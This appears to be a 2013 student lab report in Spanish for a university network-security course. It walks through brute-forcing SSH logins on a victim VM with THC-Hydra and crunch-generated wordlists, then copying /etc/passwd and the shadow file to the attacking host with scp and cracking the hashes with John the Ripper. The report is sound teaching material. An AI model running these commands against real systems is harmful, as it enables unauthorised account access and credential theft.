Thc Hydra y John the Ripper

9
UNIVERSIDAD NACIONAL AUTONOMA DE NICARAGUA FACULTAD DE CIENCIA Y TECNOLOGIA ING. EN TELEMATICA ASIGNATURA: SEGURIDAD DE REDES. TITULO: PRACTICA 1: ATAQUES CON THC-HYDRA Y JOHN THE RIPPER. PROFESOR(A): Msc. VALERIA MERCEDES MEDINA. ELABORADO POR: FRANKLIN JESUS SANCHEZ SANCHEZ. JHOSTIN ALEJANDRO MORENO ANTON. Leon 11 de abril de 2013.

description

Thc Hydra y John the Ripper

Transcript of Thc Hydra y John the Ripper

Page 1: Thc Hydra y John the Ripper

UNIVERSIDAD NACIONAL AUTONOMA DE NICARAGUA

FACULTAD DE CIENCIA Y TECNOLOGIA

ING. EN TELEMATICA

ASIGNATURA: SEGURIDAD DE REDES.

TITULO: PRACTICA 1: ATAQUES CON THC-HYDRA Y JOHN THE RIPPER.

PROFESOR(A): Msc. VALERIA MERCEDES MEDINA.

ELABORADO POR: FRANKLIN JESUS SANCHEZ SANCHEZ.

JHOSTIN ALEJANDRO MORENO ANTON.

Leon 11 de abril de 2013.

Page 2: Thc Hydra y John the Ripper

Suponga que se tiene el siguiente esquema:

Empezaremos por la creacion de las 2 maquinas virtuales, una victima y un atacant, ambas

corriendo una distribucion del S.O linux.

En la configuracion de Red de las maquinas virtuales se necesitara que ambas maquinas se puedan

comunicar entre si, permitiendo las conexiones a los diversos servicios que ofrecera la maquina

victima, la cual contara con un servicio FTP, SSH Y Web. Colocaremos el adaptador en modo host-

only ya que de esta manera las maquinas virtuales se encontraran en la misma red de la maquina

real.

Page 3: Thc Hydra y John the Ripper

Una vezrealizado lo anterior procedemos a instalar los servicios a ofrecer por la maquina

victima:

Servidor FTP

Instalacion:

sudo apt-get install vsftpd

Al instalar vsftpd se crean los siguientes archivos y directorios:

/etc/init.d/vsftpd: fichero que inicia el servidor ftp.

/usr/bin/vsftpd: archivo ejectable.

/etc/vsftpd.conf: es el fichero de configuración del servidor.

/etc/ftpusers: fichero que contiene una lista de usuarios que no se podrán conectar al servidor.

Una vez instalado se pueden configurar varias opciones:

anonymous_enable: Permite indicar si los usuarios se conteraran de modo anonimo, por

seguridad es mejor poner el campo a NO.

local_enable=YES: Permite al acceso a usuarios locales.

write_enable=YES: Permite a los usuarios subir archivos al servidor.

max_clients: Idica el maximo numero de conexiones simultaneas permitidas por el

servidor.

Page 4: Thc Hydra y John the Ripper

Servidor Web

Instalamos apache a travez del siguiente comando:

sudo apt-get install apache2.

A continuacion se podra observar desde el navegador que el servicio web esta funcionando:

Servidor SSH

Para este servicio escojimos open-ssh, para instalarlo:

apt-get install openssh-server.

Las claves se guardan en un fichero denominado “know_hosts”.

Hasta el momento se han instalado los servicios, a continuacion crearemos a los usuarios

indicados por la practica.

Page 5: Thc Hydra y John the Ripper

Maquina Atacante:

En esta maquina utilizaremos las herramientas de craqueo mencionadas por la apractica. Primero

instalaremos THC-Hydra:

Descargamos el fichero tar.gz desde la web principal del programa y lo descomprimimos en un

directorio.

Finalmente, en dicho directorio, ejecutamos:

hydra-6.1-src# ./configure

hydra-6.1-src# make

hydra-6.1-src# make install.

Esta aplicacion se ejecuta mediante el comando:

hydra {OPCIONES_TAB_TARGET} -l nombreUsuario -p password

Tambien se puede usar en modo grafico ejecutando ./xhydra:

Page 6: Thc Hydra y John the Ripper

John the ripper

sudo apt-get install john

Una vez instalado, introducimos el comando con sus parámetros:

sudo unshadow /etc/passwd /etc/shadow > misclaves

Ahora ya tenemos las dos maquinas preparadas para realizar los ataques.

1. Con la herramienta crunch 3.4 generamos un diccionario para las cuentas de usuarios y

un diccionario para las password:

./crunch 6 6 -f charset.lst lalpha -o user01.txt para los usuarios.

Crunch incluye una serie de conbinaciones para generar el diccionario, estas se

encunetran en el archivo charset.lst donde la opcion lalpha permite crear combinaciones

con todas la letras del alfabeto (a-z).

./crunch 3 4 123abcd -o user01.txt para las password.

En este caso usamos nuestra propia combinacion indicandole que genera entradas con 4

combinaciones usando numeros del 1 al 3 y letras de a-d.

2. Utilizamos hydra para obtener las contraseñas de protocolo SSH.

Le pasamos los diccionarios generados anteriormente la IP del servidor ssh, y indicamos

un archivo donde se guardara el resultado.

Page 7: Thc Hydra y John the Ripper

Al terminar de probar todas las entradas del diccionario el resultado fue el siguiente:

Ahora probamos conectarnos mediante SSH:

ssh [email protected]

Page 8: Thc Hydra y John the Ripper

3. Una vez logeados obtenemos el passwd y shadow de las victimas para luego desifrarlas

por medio de john the ripper

scp /etc/passwd [email protected]:/home/atacante

De esta manera nos hemos traido desde la maquina victima hacia la maquina atacante, los

archivos correspondientes y los hemos guardado en el directorio home. Ahora

procedemos a unir los ficheros con el comando unshadow

./unshadow /home/passwd /home/shadow >cifrado

Luego realizamos el ataque con john the ripper

./john cifrado

Page 9: Thc Hydra y John the Ripper

De esta manera se logran decifrar las contraseñas de los usuarios.